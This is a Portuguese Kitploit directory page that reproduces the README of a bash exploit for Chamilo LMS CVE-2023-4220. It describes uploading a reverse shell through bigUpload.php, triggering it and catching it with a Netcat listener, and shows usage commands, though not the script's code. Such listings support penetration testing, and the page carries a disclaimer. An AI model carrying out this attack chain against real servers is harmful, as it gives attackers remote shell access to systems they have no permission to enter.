Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Chamilo-LMS-CVE-2023-4220-Exploit — Refurbish Chamilo LMS CVE-2023-4220 exploit escrito em bash | Kitploit
Ferramentas/GitHubGitHub/0xdtc/chamilo-lms-cve-2023-4220-exploit
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHub0xdtc/chamilo-lms-cve-2023-4220-exploit

Chamilo-LMS-CVE-2023-4220-Exploit

Refurbish Chamilo LMS CVE-2023-4220 exploit escrito em bash

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
1há 1 anoAinda não revisado
Compartilhar

Exploit do Chamilo LMS CVE-2023-4220

Visão Geral

Este script explora uma vulnerabilidade de Execução Remota de Código (RCE) no Chamilo LMS versões ≤ v1.11.24. A vulnerabilidade (CVE-2023-4220) existe devido a uma funcionalidade de upload de arquivo irrestrito no recurso bigUpload.php do Chamilo LMS, que permite que atacantes façam upload de arquivos arbitrários (como web shells) e os executem, levando à execução remota total de código no servidor.

Este script foi aprimorado por Divine Clown para otimizar o processo de exploração, gerando automaticamente um arquivo de reverse shell, fazendo upload para o alvo e iniciando um listener para dar ao atacante acesso direto ao shell.


Detalhes do CVE

  • ID do CVE: CVE-2023-4220
  • Software Afetado: Chamilo LMS ≤ v1.11.24
  • Tipo de Vulnerabilidade: Execução Remota de Código (RCE)
  • Vetor de Ataque: Upload de arquivo irrestrito em /main/inc/lib/javascript/bigupload/inc/bigUpload.php

Funcionalidades

  • Baixa automaticamente um reverse shell do revshells.com baseado no IP e porta do atacante.
  • Faz upload do reverse shell usando o endpoint vulnerável bigUpload.php.
  • Dispara silenciosamente o shell e abre um listener Netcat para acesso direto.

Melhoria por Divine Clown:

  • Todas as etapas intermediárias (download do shell, upload, etc.) são ocultadas, mostrando apenas o reverse shell resultante para uso simplificado.

Uso

root@kitploit:~
./CVE-2023-4220.sh -i <attacker_ip> -p <port> -h <host_link>

Parâmetros:

  • -i <attacker_ip>: O endereço IP do atacante para o reverse shell.
  • -p <port>: A porta onde o listener Netcat será iniciado.
  • -h <host_link>: A URL completa da instância vulnerável do Chamilo LMS.

Exemplo:

root@kitploit:~
./CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com

Pré-requisitos

  • Netcat instalado em sua máquina.
  • Certifique-se de que a versão do Chamilo LMS alvo é vulnerável (≤ v1.11.24).
  • Permissões adequadas para realizar testes de penetração ou exploração.

Detalhamento Técnico

  1. O script baixa um reverse shell do revshells.com, gerando-o dinamicamente com base no IP e porta do atacante.
  2. O reverse shell é enviado para o endpoint vulnerável bigUpload.php.
  3. O arquivo enviado é executado ao acessar sua URL no servidor.
  4. Um listener Netcat é iniciado e, quando o arquivo é acionado, uma conexão reverse shell é estabelecida, dando ao atacante acesso à linha de comando.

Aviso Legal

Esta ferramenta destina-se exclusivamente a fins educacionais e ambientes de teste onde você tenha permissão explícita para explorar vulnerabilidades. O acesso não autorizado a sistemas é ilegal e pode resultar em acusações criminais. Os autores não serão responsabilizados por qualquer uso indevido ou dano causado por este script.


Créditos

  • Autor do Exploit Original: Ziad Sakr @Ziad-Sakr
  • Melhorias e Refinamentos: Eu (Divine Clown)

Sinta-se à vontade para modificar o README ainda mais se quiser incluir qualquer informação ou formatação adicional! Avise-me se precisar de mais alguma coisa.

Baixar ferramenta